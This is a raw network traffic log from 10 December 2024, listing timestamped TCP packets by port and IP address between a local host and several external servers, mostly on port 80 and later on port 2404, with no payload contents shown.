Dec 10, 2024 13:52:56.911667109 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.913845062 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.913964033 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.914005995 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.916198969 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.916245937 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.916253090 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.916290045 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927097082 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927129030 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927149057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927170038 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927870989 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927966118 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.928009987 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.930170059 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.930224895 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.930280924 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.932499886 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.932554007 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.932583094 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.932624102 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.934900045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.934978008 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.935030937 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.937170029 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.937223911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.937256098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.937309027 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.939554930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.939713955 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.939762115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.941931963 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.942007065 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.942063093 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.944473982 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.944592953 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.944641113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.946671009 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.946800947 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.946872950 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.948995113 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.949042082 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.949115038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.949691057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.951365948 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.951416969 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.951519966 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953691006 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.953731060 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953773022 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.953824043 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953881979 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.956118107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.956223011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.956269979 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.958425045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.958565950 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.958614111 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.960818052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.960866928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.961010933 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.961688042 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.963162899 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.963212013 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.963262081 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.963310957 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.965562105 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.965670109 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.965684891 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.965702057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.967880011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.967986107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.968040943 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.970303059 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.970402002 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.970451117 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.972647905 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.972695112 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.080279112 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.080316067 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.080341101 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.080357075 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.081310987 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.081387997 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.081449032 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.083148956 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.083235979 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.083297968 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.085583925 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.085686922 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.085721016 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.085757971 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.087846041 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.087892056 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.087960958 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.087999105 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.090244055 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.090292931 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.090302944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.090329885 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.092566013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.092617989 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.092698097 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.092906952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.094614983 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.094722986 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.094782114 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.096604109 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.096694946 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.096751928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.098759890 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.098828077 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.098865032 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.099085093 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.100605011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.100660086 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.100697041 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.100735903 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.102545023 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.102639914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.102689981 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.104629993 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.104664087 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.104682922 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.104695082 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.107151985 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.107214928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.107242107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.107279062 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.108614922 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.108664036 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.108692884 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.108793974 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.110510111 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.110594988 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.110641956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.112498045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.112559080 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.112623930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.112695932 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.114504099 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.114521027 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.114552021 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.114578962 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.116528988 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.116630077 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.116687059 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.118489027 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.118524075 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.118571997 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.120471001 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.120522976 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.120554924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.120594025 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.122473955 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.122543097 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.122565031 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.122581959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.124476910 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.124528885 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.124619007 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.124701977 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.126449108 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.126529932 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.126584053 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.128421068 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.128472090 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.128544092 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.128581047 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.130379915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.130439997 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.130492926 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.130569935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.132476091 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.132527113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.132797956 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.133058071 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.134393930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.134442091 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.134486914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.134537935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.136409044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.136490107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.136514902 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.136524916 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.138417006 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.138498068 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.138554096 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.140351057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.140409946 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.140438080 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.140476942 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.142437935 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.142482996 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.142528057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.142560959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.144373894 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.144442081 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.144511938 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.144550085 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.146358013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.146411896 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.146454096 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.349054098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.349087000 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.393769979 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394213915 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.394444942 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394735098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.394897938 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.394983053 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.395023108 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.396106005 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.396119118 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.396147966 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.396178007 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.397198915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.397676945 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.464396954 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464461088 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464538097 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.464852095 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.464895010 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.465120077 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.465161085 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.465243101 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.465282917 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.466326952 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.466531038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.466568947 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.467478037 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.467520952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.467586994 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.467631102 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.468631983 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.468676090 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.468751907 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.468792915 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.469878912 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470170021 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470211983 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.470905066 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.470944881 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.470966101 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.471007109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.472074032 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.472142935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.472165108 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.472204924 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.473153114 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.473309040 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.473356962 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.474329948 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.474473953 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.474519014 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.475447893 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.475492001 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.475574017 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.475615978 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.476564884 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.476660013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.476703882 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.477674007 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.477720022 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.477741003 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.477782965 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.478830099 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.478899956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.478965044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.479005098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.479945898 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.479988098 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.480035067 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.480073929 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.481055021 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.481185913 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.481230021 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.482187986 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.482230902 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.482295990 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.482337952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.483372927 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.483414888 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.483475924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.483520985 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.484426022 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.484554052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.484599113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.485570908 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.485625982 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.485691071 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.485744953 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.486720085 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.486766100 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.486820936 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.486860037 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.487773895 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.487819910 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:58.362973928 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.482460976 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:58.482662916 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.495419025 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:58.614876032 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.649044991 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.770776987 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:52:59.882679939 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:52:59.889051914 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.009241104 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.009295940 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.128856897 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.364224911 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.366046906 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.486140966 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.556202888 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.558361053 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.661454916 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.677889109 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.681770086 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.706701994 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:00.811196089 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:00.826112032 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:00.930660963 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:00.930880070 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:00.931035995 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:53:01.050782919 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:01.836289883 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:01.890404940 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.070458889 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:02.081154108 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:02.178631067 CET8049940178.237.33.50192.168.2.5
                                                                          Dec 10, 2024 13:53:02.178715944 CET4994080192.168.2.5178.237.33.50
